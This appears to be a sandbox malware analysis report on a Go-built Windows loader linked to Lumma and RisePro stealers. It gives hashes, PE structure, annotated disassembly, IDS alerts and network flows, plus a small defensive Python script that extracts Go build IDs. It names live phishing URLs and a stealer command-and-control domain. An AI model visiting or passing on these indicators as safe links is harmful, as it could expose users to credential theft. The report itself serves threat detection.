CLOUDFLARENETUS | https://pot.soundestlink.com/ce/c/6632d4bee95a733e5b11f90c/66336ffc6318519b93081379/663370167f943a5ca8cda723?signature=f078b55518dec9be5687b83cc67125e09d569e23f92457525770ae31d9667613 | malicious | HtmlDropper, HTMLPhisher | 172.67.129.30
CLOUDFLARENETUS | oO2wHSVFJM.exe | malicious | RisePro Stealer | 104.26.5.15
CLOUDFLARENETUS | 9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher | 172.64.41.3
CLOUDFLARENETUS | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 162.159.61.3
CLOUDFLARENETUS | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 162.159.61.3
CLOUDFLARENETUS | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 162.159.61.3
CLOUDFLARENETUS | http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 172.64.41.3
CLOUDFLARENETUS | https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$ | malicious | Fake Captcha | 1.1.1.1
CLOUDFLARENETUS | https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$ | malicious | Fake Captcha | 1.1.1.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | oO2wHSVFJM.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | 4yFaZU8fhT.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | RY5YJaMEWE.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | MejqsB9tx9.exe | malicious | Amadey | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | OUZXNOqKXg.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | 0BzQNa8hYd.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | 3CkMJ4UkNy.exe | malicious | RisePro Stealer | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | Notice.xls | malicious | Unknown | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | setup.msi | malicious | Unknown | 104.21.95.19
a0e9f5d64349fb13191bc781f81f42e1 | SecuriteInfo.com.Win32.PWSX-gen.8803.13656.exe | malicious | RisePro Stealer | 104.21.95.19
                                                            No created / dropped files found
File type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit): 6.375467626107391
TrID:
• Win64 Executable (generic) (12005/4) 74.95%
• Generic Win/DOS Executable (2004/3) 12.51%
• DOS Executable Generic (2002/1) 12.50%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: file.exe
File size: 9'048'064 bytes
MD5: 7e37f8c945d005226870e60aa2baea93
SHA1: d8a457a032ead8cc0d692efd497914e8cc69e8a4
SHA256: d130f492c40697a34e2d1e7b1e9a5e3ba37c7f6b4271271fba6b5c1e9048af8b
SHA512: d6dfcbd1f7bca1e712bdb184a27c5a06eb1073f03529fd6be9ed2cd231e4906edf9c7bb6fd89453a7e062cc317e4655b19825fdbf7a32d0f2c3ac3ef4bc2f8d6
SSDEEP: 98304:MF3gRcZz6mXSsz06DoWy0hSEVBhG/Y6Pv:IdN6mXSsFo7i/VB9w
TLSH: 35964907ECA148E8C5EDD534866A8222BB727C484B3167D72B60F7782F76BD06E79350
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.^:......^.............@....................................C.....`... ............................
Icon Hash: 0f23493905039619
Entrypoint: 0x1400014c0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC] (a zeroed timestamp, as reproducible-build linkers such as Go's write it; it carries no build-time information)
TLS Callbacks: 0x14039b680, 0x14039b650, 0x14039f0f0 (three 64-bit pointers into .text; the report printed each as a low/high dword pair, "0x4039b680, 0x1, 0x4039b650, 0x1, 0x4039f0f0, 0x1". TLS callbacks run before the entry point, so a debugger that only breaks at 0x1400014c0 misses them)
CLR (.Net) Version: none
OS Version Major: 6
OS Version Minor: 1
File Version Major: 6
File Version Minor: 1
Subsystem Version Major: 6
Subsystem Version Minor: 1
Import Hash: c595f1660e1a3c84f4d9b0761d23cd7a
Instruction (entry point 0x1400014c0)
The report's decoder read this x86-64 code in 32-bit mode, so every "dec eax" in the original listing is the REX.W prefix (0x48) of the instruction that follows it. Decoded as x86-64 the listing is:
sub rsp, 28h
mov rax, qword ptr [rip+0086D9B5h]
mov dword ptr [rax], 00000001h
call 00007EFCBC8017CFh
nop
nop
add rsp, 28h
ret
nop dword ptr [rax]
sub rsp, 28h
mov rax, qword ptr [rip+0086D995h]
mov dword ptr [rax], 00000000h
call 00007EFCBC8017AFh
nop
nop
add rsp, 28h
ret
nop dword ptr [rax]
sub rsp, 28h
call 00007EFCBCBA6A6Ch
test rax, rax
sete al
movzx eax, al
neg eax
add rsp, 28h
ret
nop (7 bytes of alignment padding)
lea rcx, qword ptr [rip+00000009h]
jmp 00007EFCBC801AE9h
nop dword ptr [rax+00h]
ret
nop (15 bytes of alignment padding)
The first two stubs are identical except for the value stored through the loaded pointer (1 at the entry point, 0 in the second) before the same call; this is consistent with the WinMainCRTStartup/mainCRTStartup pair of a MinGW-w64 C runtime, and the 1 matches the GUI subsystem of the file.
The remaining lines of the original listing ("jmp dword ptr [eax]" through "pop edi") are not instructions at all. Re-encoded to bytes they read, as ASCII,
\xff Go build ID: "0g2NfiXxq0Hy1N8t?PR-/Ty91xit?2Fq9mIG8U1Fs?u?Cm7heWcfK_
where each ? stands for the displacement byte of a conditional jump that the listing does not print. This is the Go linker's build-ID marker (the string "go tool buildid" extracts), which here follows the entry stubs in .text. Together with the Go module dependency string visible in .data and the "stripped to external PDB" file type, it shows that file.exe is a Go program linked through an external GNU/MinGW-style toolchain; the LummaC behaviour the signatures describe runs in the injected BitLockerToGo.exe process, not in this entry code.
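The marker above can be pulled out of any Go binary or memory dump without a disassembler. The following Python is an added example (it is not part of the Joe Sandbox report and not code from the sample): it scans a byte buffer for the Go linker's build-ID sentinels, returns the ID and its "/"-separated components, and returns None for a truncated marker or for sentinel bytes that occur inside unrelated data. The sample buffer is constructed for the demonstration and the build ID in it is made up; the character-set check is a heuristic of this example.

```python
"""Recover the Go linker build ID from raw bytes (added example; not report or sample code)."""
from typing import List, Optional

# Sentinels the Go linker writes around the build ID; `go tool buildid`
# searches for the same pair.
GO_BUILD_ID_PREFIX = b'\xff Go build ID: "'
GO_BUILD_ID_SUFFIX = b'"\n \xff'
MAX_BUILD_ID_LEN = 256  # real IDs are well under 100 bytes; bounds the scan

# Heuristic alphabet for the ID body: base64url-style characters plus the '/'
# that separates its components.
VALID_ID_BYTES = frozenset(
    b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_/"
)


def find_go_build_id(data: bytes) -> Optional[str]:
    """Return the build ID embedded in `data`, or None.

    None means: no prefix, no closing sentinel within MAX_BUILD_ID_LEN bytes
    (a truncated dump), or a prefix matched inside data that is not an ID.
    """
    start = data.find(GO_BUILD_ID_PREFIX)
    if start < 0:
        return None
    id_start = start + len(GO_BUILD_ID_PREFIX)
    search_end = id_start + MAX_BUILD_ID_LEN + len(GO_BUILD_ID_SUFFIX)
    end = data.find(GO_BUILD_ID_SUFFIX, id_start, search_end)
    if end < 0:
        return None
    raw = data[id_start:end]
    if not raw or any(b not in VALID_ID_BYTES for b in raw):
        return None
    return raw.decode("ascii")


def split_go_build_id(build_id: str) -> List[str]:
    """The components of a build ID are separated by '/'."""
    return build_id.split("/")


def build_id_from_file(path: str) -> Optional[str]:
    """Convenience wrapper: scan a whole file on disk (PE, ELF or raw dump)."""
    with open(path, "rb") as fh:
        return find_go_build_id(fh.read())


# Constructed sample (not taken from file.exe): a few bytes of x86-64 code and
# padding, then the marker around a made-up ID of the usual four-part shape.
CONSTRUCTED_ID = "abcdEFGH1234/ijklMNOP5678/qrstUVWX9012/yzAB-_cd3456"
SAMPLE_TEXT = (
    b"\x48\x83\xec\x28\xc3" + b"\x90" * 11
    + GO_BUILD_ID_PREFIX + CONSTRUCTED_ID.encode() + GO_BUILD_ID_SUFFIX
    + b"\x00" * 16
)
# The same data cut off inside the ID, as a partial memory dump would be.
TRUNCATED_DUMP = SAMPLE_TEXT[: SAMPLE_TEXT.index(b"/qrst")]
# Prefix bytes followed by something that is not an ID (contains spaces).
FALSE_POSITIVE = GO_BUILD_ID_PREFIX + b"not an id" + GO_BUILD_ID_SUFFIX

if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        print(build_id_from_file(sys.argv[1]))
    else:
        print(find_go_build_id(SAMPLE_TEXT))
```

Run it with a path argument to scan a real binary, or without one to see it recover the constructed ID. The ID is a useful pivot: the same build ID on two files means the same linker output, which ties repackaged or re-signed copies of a Go loader together.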
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x91e000 | 0x4e | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x91f000 | 0x1458 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x923000 | 0x4f60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x870000 | 0x162fc | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x928000 | 0x153b0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_TLS | 0x86e7e0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_IAT | 0x91f494 | 0x458 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | (none)
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | (none)
The empty SECURITY and DEBUG entries match the unsigned, debug-stripped file described above; the empty LOAD_CONFIG entry means the image carries no Control Flow Guard metadata. The TLS directory is 0x28 bytes, the size of a PE32+ TLS directory, which is where the three 64-bit callback pointers listed above come from.
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3a5c20 | 0x3a5e00 | f8cc0bdff922743288e937a3961a4dbc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x3a7000 | 0x823d0 | 0x82400 | 06d43a969a86f3483b3c599124c2ac8a | False | 0.3443179432581574 | dBase III DBT, version number 0, next free block index 10, 1st item "dep\011github.com/Azure/azure-sdk-for-go/sdk/internal\011v1.0.0\011h1:jp0dGvZ7ZK0mgqnTSClMxa5xuRL7NZgHameVYF6BurY=" | 5.331801836131035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x42a000 | 0x445610 | 0x445800 | 07d9bbc7b7c411e5ccc443da171444fc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x870000 | 0x162fc | 0x16400 | a2b812484ac5efec12dc248df379f18a | False | 0.40337517556179775 | data | 5.675260072286768 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x887000 | 0xc50 | 0xe00 | 6ed8a8f76a224934b29fcbe34f6390b0 | False | 0.25864955357142855 | data | 3.989879659761562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x888000 | 0x95de0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x91e000 | 0x4e | 0x200 | aba40bd052310385c1f231195739ff36 | False | 0.08984375 | data | 0.6513844786319263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata | 0x91f000 | 0x1458 | 0x1600 | b597ce457ec0e4b302a271cacfbfffa2 | False | 0.2975852272727273 | data | 4.351283065220556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x921000 | 0x70 | 0x200 | 31fcf38d535a5764601d9a23884969e2 | False | 0.08203125 | data | 0.46748837148086453 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x922000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x923000 | 0x4f60 | 0x5000 | 4270861923e321a11fb038ba198532fc | False | 0.47255859375 | data | 6.448265657019227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x928000 | 0x153b0 | 0x15400 | add0325d735bd28deced8b7d6774eb7d | False | 0.21808363970588235 | data | 5.432523906558254 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x923130 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.4964572508266415
RT_GROUP_ICON | 0x927358 | 0x14 | data | | | 1.1
RT_VERSION | 0x92736c | 0x584 | data | English | United States | 0.24929178470254956
RT_MANIFEST | 0x9278f0 | 0x670 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.40230582524271846
DLL | Import
KERNEL32.dll | AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
msvcrt.dll | ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/02/24-17:04:31.224285 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49722 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:21.147175 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49718 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:21.035950 | UDP | 2052217 | ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (shatterbreathepsw .shop) | 51308 | 53 | 192.168.2.6 | 1.1.1.1
05/02/24-17:04:22.766689 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49719 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:32.059166 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49723 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:34.127001 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49726 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:24.741485 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49720 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:32.842406 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49724 | 443 | 192.168.2.6 | 104.21.95.19
05/02/24-17:04:25.682174 | TCP | 2052224 | ET TROJAN Observed Lumma Stealer Related Domain (shatterbreathepsw .shop in TLS SNI) | 49721 | 443 | 192.168.2.6 | 104.21.95.19
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:04:21.141778946 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.141818047 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:21.141904116 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.147175074 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.147202969 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:21.558207989 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:21.558293104 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.562489986 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.562499046 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:21.562834024 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:21.610850096 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.673034906 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.673065901 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:21.673191071 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.756299973 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.756385088 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.756452084 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.760368109 CEST | 49718 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.760382891 CEST | 443 | 49718 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.766140938 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.766171932 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.766338110 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.766689062 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.766700983 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.957740068 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.957808018 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.959384918 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.959388971 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.959625006 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:22.961633921 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.961652040 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
May 2, 2024 17:04:22.961698055 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474091053 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474143028 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474169970 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474191904 CEST | 443 | 49719 | 104.21.95.19 | 192.168.2.6
May 2, 2024 17:04:23.474209070 CEST | 49719 | 443 | 192.168.2.6 | 104.21.95.19
